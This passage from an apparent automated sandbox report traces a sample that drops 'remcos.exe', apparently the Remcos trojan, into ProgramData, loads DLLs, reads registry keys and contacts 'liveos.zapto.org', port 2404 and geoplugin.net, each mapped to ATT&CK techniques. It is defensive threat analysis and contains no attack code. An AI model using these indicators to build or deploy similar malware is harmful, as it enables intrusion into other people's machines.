\"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\shell32.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\MICROS~3\\Office14\\GROOVEEX.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\office.odf (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter srvcli.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter slc.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter SETUPAPI.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter DEVRTL.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter imageres.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00005888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-1 (UID: 00000000-00005888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ext-ms-win-kernel32-package-current-l1-1-0 (UID: 00000000-00005888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001852)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001852)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001852)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001852)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-1 (UID: 00000000-00001852)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ext-ms-win-kernel32-package-current-l1-1-0 (UID: 00000000-00001852)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"file.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"file.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"ext-ms-win-kernel32-package-current-l1-1-0\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"file.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76CB0000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76CB0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"file.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"file.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"remcos.exe\" (UID: 00000000-00005888)\n Spawned process \"iexplore.exe\" (UID: 00000000-00006132)\n Spawned process \"remcos.exe\" (UID: 00000000-00001852)\n Spawned process \"iexplore.exe\" (UID: 00000000-00004240)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"remcos.exe\" (UID: 00000000-00005888)\n Spawned process \"iexplore.exe\" (UID: 00000000-00006132)\n Spawned process \"remcos.exe\" (UID: 00000000-00001852)\n Spawned process \"iexplore.exe\" (UID: 00000000-00004240)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:2404\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache\" Response ==> HTTP/1.1 200 OK\ndate: Fri\n 18 Oct 2024 22:35:12 GMT\nserver: Apache\ncontent-length: 962\ncontent-type: application/json; charset=utf-8\ncache-control: public\n max-age=300\naccess-control-allow-origin: * with response body ==>7B0A20202267656F706C7567696E5F72657175657374223A2236342E3132342E31322E313632222C0A20202267656F706C7567696E5F737461747573223A3230.......\n \"GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache\" Response ==> HTTP/1.1 200 OK\ndate: Fri\n 18 Oct 2024 22:37:32 GMT\nserver: Apache\ncontent-length: 962\ncontent-type: application/json; charset=utf-8\ncache-control: public\n max-age=300\naccess-control-allow-origin: * with response body ==>7B0A20202267656F706C7567696E5F72657175657374223A2236342E3132342E31322E313632222C0A20202267656F706C7567696E5F737461747573223A3230.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"geoplugin.net\"\n \"liveos.zapto.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"file.exe\" has an executable section named \".text\"\n \"remcos.exe.bin\" has an executable section named \".text\"\n \"DISMHOST.EXE.6712E6A3.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"file.exe\" has an writable section named \".data\"\n \"file.exe\" has an writable section named \".tls\"\n \"remcos.exe.bin\" has an writable section named \".data\"\n \"remcos.exe.bin\" has an writable section named \".tls\"\n \"DISMHOST.EXE.6712E6A3.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"file.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"remcos.exe.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.6712E6A3.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"remcos.exe\" (UID: 00000000-00001852) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"remcos.exe\" (UID: 00000000-00001852) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"file.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"file.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"file.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"remcos.exe.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"remcos.exe.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"remcos.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.6712E6A3.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.6712E6A3.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.6712E6A3.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.6712E6A3.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"file.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"remcos.exe.bin\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.6712E6A3.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"file.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"file.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\Rstrtmgr.DLL\"\n \"file.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"file.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"file.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"file.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"file.exe\" reads file \"c:\\file.exe\"\n \"file.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"file.exe\" reads file \"c:\\users\\desktop.ini\"\n \"file.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini\"\n \"file.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini\"\n \"file.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"file.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"file.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"file.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"file.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"file.exe\" trying to touch file \"C:\\version.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"file.exe\" trying to touch file \"C:\\file.exe.Local\\\"\n \"file.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"file.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"file.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"file.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"file.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"file.exe\" trying to access non-existent file \"C:\\file.exe.Local\\\"\n \"file.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\desktop.ini\"\n \"file.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\desktop.ini\"\n \"file.exe\" trying to access non-existent file \"C:\\ProgramData\\tst\\desktop.ini\"\n \"file.exe\" trying to access non-existent file \"C:\\Program Files\\7-Zip\\Lang\\en.txt\"\n \"file.exe\" trying to access non-existent file \"\\SystemRoot\\WinSxS\\FileMaps\\programdata_tst_538e5608e643cf87.cdf-ms\"\n \"file.exe\" trying to access non-existent file \"C:\\ProgramData\\tst\\remcos.exe:Zone.Identifier\"\n \"file.exe\" trying to access non-existent file \"C:\\FILE.EXE.LOCAL\"\n \"file.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\DESKTOP.INI\"\n \"file.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\DESKTOP.INI\"\n \"file.exe\" trying to access non-existent file \"C:\\ProgramData\\tst\\DESKTOP.INI\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"file.exe\" touched file \"C:\\Program Files\\7-Zip\\Lang\\en.txt\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"file.exe\" writes file \"c:\\programdata\\tst\\remcos.exe\"\n \"file.exe\" writes file \"%allusersprofile%\\tst\\remcos.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"file.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"file.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"file.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"file.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"START_MINMFU\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\JVAJBEQ.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.JVAQBJF.PBAGEBYCNARY\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\ZFCHO.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\CBJRECAG.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\RKPRY.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\ZFNPPRFF.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\BHGYBBX.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG FVYIREYVTUG\\5.1.50907.0\\FVYIREYVTUG.PBASVTHENGVBA.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.VAGREARGRKCYBERE.QRSNHYG\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"308046O0NS4N39PO\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\NQBOR\\NPEBONG ERNQRE QP\\ERNQRE\\NPEBEQ32.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"P:\\HFREF\\UNCHOJF\\NCCQNGN\\YBPNY\\ZVPEBFBSG\\JVAQBJF\\GRZCBENEL VAGREARG SVYRF\\PBAGRAG.VR5\\1S2UE9R2\\2014UNAPBZICQA_UBZR.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\RKCYBERE.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.JVAQBJF.CUBGBIVRJRE\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"P:\\HFREF\\UNCHOJF\\NCCQNGN\\YBPNY\\ZVPEBFBSG\\JVAQBJF\\GRZCBENEL VAGREARG SVYRF\\PBAGRAG.VR5\\CV95N64Q\\CLGUBA-3.6.3.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: 